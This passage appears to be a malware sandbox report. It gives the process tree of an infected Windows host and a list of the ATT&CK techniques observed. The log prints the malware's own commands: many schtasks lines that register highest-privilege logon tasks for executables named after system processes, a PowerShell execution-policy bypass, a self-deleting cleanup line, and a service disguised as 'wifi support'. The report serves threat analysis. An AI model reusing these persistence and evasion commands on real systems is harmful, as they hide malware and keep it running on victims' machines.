C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5Q0K0I~1.DLL,YQlX
5⤵
PID:3040

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 29736
6⤵
PID:5100

C:\Windows\system32\ctfmon.exe
ctfmon.exe
7⤵
PID:4228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp62B9.tmp.ps1"
5⤵
PID:1016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\PerfLogs\Admin\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\fwcfg\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BFafj0WNEwStOL8atl0gJOMh" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Are\BFafj0WNEwStOL8atl0gJOMh.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\L2Schemas\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Setup (10)" /sc ONLOGON /tr "'C:\Documents and Settings\Setup (10).exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "6529285" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\AssertRegister\6529285.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2608

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\schtasks.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\gcdef\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\WindowsPowerShell\Modules\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BFafj0WNEwStOL8atl0gJOMh.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-HFV9H.tmp\BFafj0WNEwStOL8atl0gJOMh.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\System32\iscsilog\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ld0xZ3kQ40S3Liv8SVEAFr4q" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Opened\ld0xZ3kQ40S3Liv8SVEAFr4q.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\System32\C_10081\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2076

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\PerfLogs\Admin\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:340

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BFafj0WNEwStOL8atl0gJOMh.tmp" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\BFafj0WNEwStOL8atl0gJOMh.tmp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\sppwmi\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2232

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Setup (10)" /sc ONLOGON /tr "'C:\Documents and Settings\Setup (10).exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2196

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\System32\vcomp110\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BFafj0WNEwStOL8atl0gJOMh" /sc ONLOGON /tr "'C:\Users\Public\Favorites\BFafj0WNEwStOL8atl0gJOMh.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "7sHzdYiVMSB3TOEUPDZQK5Zh" /sc ONLOGON /tr "'C:\Users\Admin\Documents\SkipSuspend\7sHzdYiVMSB3TOEUPDZQK5Zh.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Windows\System32\win32spl\lsm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2220

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "3FyhsKaxI4JVmtHjcZ5MshWn" /sc ONLOGON /tr "'C:\Recovery\4537d782-9a0d-11eb-a52e-c2ebb310cb62\3FyhsKaxI4JVmtHjcZ5MshWn.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "KNSaRCp1_xDXoKvn5gjZi_Wj" /sc ONLOGON /tr "'C:\PerfLogs\Admin\KNSaRCp1_xDXoKvn5gjZi_Wj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1356

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:828

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:912

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2220

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3484

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3576

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3596

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3588

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3164

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3260

C:\Users\Admin\AppData\Local\Temp\8814.exe
C:\Users\Admin\AppData\Local\Temp\8814.exe
1⤵
PID:2820

C:\Users\Admin\AppData\Local\Temp\C3AE.exe
C:\Users\Admin\AppData\Local\Temp\C3AE.exe
1⤵
PID:2352

C:\Users\Admin\AppData\Local\Temp\4839.exe
C:\Users\Admin\AppData\Local\Temp\4839.exe
1⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 4839.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4839.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:3564

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 4839.exe /f
3⤵
- Kills process with taskkill
PID:2804

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:4060

C:\Users\Admin\AppData\Local\Temp\62BC.exe
C:\Users\Admin\AppData\Local\Temp\62BC.exe
1⤵
PID:5116

C:\Windows\system32\taskeng.exe
taskeng.exe {5A55A24C-8F50-4D49-9153-9DE900B7B7F4} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
PID:2332

C:\Users\Admin\AppData\Roaming\vrvbccu
C:\Users\Admin\AppData\Roaming\vrvbccu
2⤵
PID:1916

C:\Users\Admin\AppData\Roaming\ttvbccu
C:\Users\Admin\AppData\Roaming\ttvbccu
2⤵
PID:2856

C:\Users\Admin\AppData\Local\Temp\1E5E.exe
C:\Users\Admin\AppData\Local\Temp\1E5E.exe
1⤵
PID:3544

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\triykayj\
2⤵
PID:3924

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jnuyadtf.exe" C:\Windows\SysWOW64\triykayj\
2⤵
PID:1784

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create triykayj binPath= "C:\Windows\SysWOW64\triykayj\jnuyadtf.exe /d\"C:\Users\Admin\AppData\Local\Temp\1E5E.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:3684

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description triykayj "wifi internet conection"
2⤵
PID:3948

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1240

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4300

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2588

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3080

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4736

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4944

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:752

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5008

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1112

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery